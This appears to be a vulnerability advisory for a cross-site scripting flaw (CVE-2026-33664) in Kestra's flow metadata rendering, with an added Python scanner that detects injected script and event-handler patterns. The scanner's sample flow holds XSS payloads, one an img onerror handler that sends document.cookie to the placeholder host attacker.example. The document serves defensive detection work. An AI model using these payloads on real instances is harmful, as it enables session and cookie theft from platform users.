Kestra Orchestration Platform XSS Vulnerability (CVE-2026-33664)
Kestra versions up to and including 1.3.3 are affected by a cross-site scripting (XSS) vulnerability (CVE-2026-33664) that allows arbitrary JavaScript execution in the browser of any user who views crafted flow metadata.
Kestra, an open-source, event-driven orchestration platform, is vulnerable to a reflected cross-site scripting (XSS) vulnerability, identified as CVE-2026-33664. The flaw affects versions up to and including 1.3.3. The application fails to properly sanitize user-supplied flow YAML metadata fields, specifically description, inputs[].displayName, and inputs[].description. These fields are rendered through the Markdown.vue component with html: true, so raw HTML in the Markdown source is passed through unsanitized…
Detection coverage (2 rules)
Detect Suspicious Kestra Flow Metadata with JavaScript Injection
Severity: high. Detects potential XSS attacks in Kestra by identifying suspicious patterns indicative of JavaScript injection in flow metadata.
Detect Suspicious Kestra Flow Metadata with JavaScript Event Handlers
Severity: high. Detects potential XSS attacks in Kestra by identifying suspicious patterns indicative of JavaScript injection in flow metadata using event handlers.
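The two rules above are described only by name on this page; the platform's actual queries are not shown. The following is an added example, not Kestra's code and not the vendor's detection logic, of how a practitioner could implement the same two checks themselves: it walks exactly the three metadata fields the advisory names (description, inputs[].displayName, inputs[].description) and flags inline script / javascript: URL payloads separately from HTML event-handler attributes. The two flows are constructed inline as already-parsed dicts; in practice they would come from loading the flow YAML (for example with PyYAML) or from the Kestra flow API, which is assumed here rather than shown. The hostnames, flow ids and payloads are illustrative.

```python
import re
from typing import Iterator

# Constructed sample: a flow whose metadata carries two XSS payloads.
# Shaped like the fields the advisory names; not taken from a real incident.
MALICIOUS_FLOW = {
    "id": "nightly-export",
    "namespace": "example",
    "description": "Nightly export <script>alert(document.cookie)</script>",
    "inputs": [
        {
            "id": "region",
            "type": "STRING",
            # Hypothetical exfiltration host; event handler fires on render.
            "displayName": '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
            "description": "AWS region",
        },
    ],
}

# Constructed sample: ordinary Markdown (emphasis, code span, autolink) that
# must NOT be flagged, to show the patterns do not trip on angle brackets alone.
BENIGN_FLOW = {
    "id": "daily-report",
    "namespace": "example",
    "description": "Runs **daily** and writes to `s3://bucket`. See <https://example.org/docs>.",
    "inputs": [
        {"id": "date", "type": "DATE", "displayName": "Run date",
         "description": "Date to process, e.g. 2024-01-01"},
    ],
}

# Rule 1: script-style injection (inline <script>, javascript: URLs, and
# tags commonly used to smuggle script into Markdown rendered with html: true).
SCRIPT_INJECTION = re.compile(
    r"<\s*script\b|javascript\s*:|<\s*iframe\b|<\s*svg\b|<\s*object\b|<\s*embed\b",
    re.IGNORECASE,
)
# Rule 2: HTML event-handler attributes (onerror=, onload=, onclick=, ...).
# The leading \b stops "configuration=" from matching.
EVENT_HANDLER = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)


def metadata_fields(flow: dict) -> Iterator[tuple[str, str]]:
    """Yield (path, value) for each field the advisory says Markdown.vue renders."""
    if isinstance(flow.get("description"), str):
        yield "description", flow["description"]
    for i, inp in enumerate(flow.get("inputs") or []):
        for key in ("displayName", "description"):
            val = inp.get(key)
            if isinstance(val, str):
                yield f"inputs[{i}].{key}", val


def scan_flow(flow: dict) -> list[dict]:
    """Return one finding per (field, rule) hit, in field order."""
    findings = []
    for path, value in metadata_fields(flow):
        m = SCRIPT_INJECTION.search(value)
        if m:
            findings.append({"field": path, "rule": "script_injection", "match": m.group(0)})
        m = EVENT_HANDLER.search(value)
        if m:
            findings.append({"field": path, "rule": "event_handler", "match": m.group(0)})
    return findings


if __name__ == "__main__":
    for flow in (MALICIOUS_FLOW, BENIGN_FLOW):
        hits = scan_flow(flow)
        print(f"{flow['namespace']}.{flow['id']}: {len(hits)} finding(s)")
        for h in hits:
            print(f"  [{h['rule']}] {h['field']}: {h['match']!r}")
```

The scanner is deliberately field-scoped: it only inspects the three fields the advisory identifies, which keeps the false-positive surface small (task definitions and scripts elsewhere in a flow legitimately contain angle brackets and the word "on"). Event-handler detection is reported as its own rule, mirroring the page's split, because an `<img onerror=...>` payload contains no `<script>` tag and would be missed by a script-only pattern. A flow that hits either rule should be reviewed before anyone opens it in the UI on an unpatched (<= 1.3.3) instance.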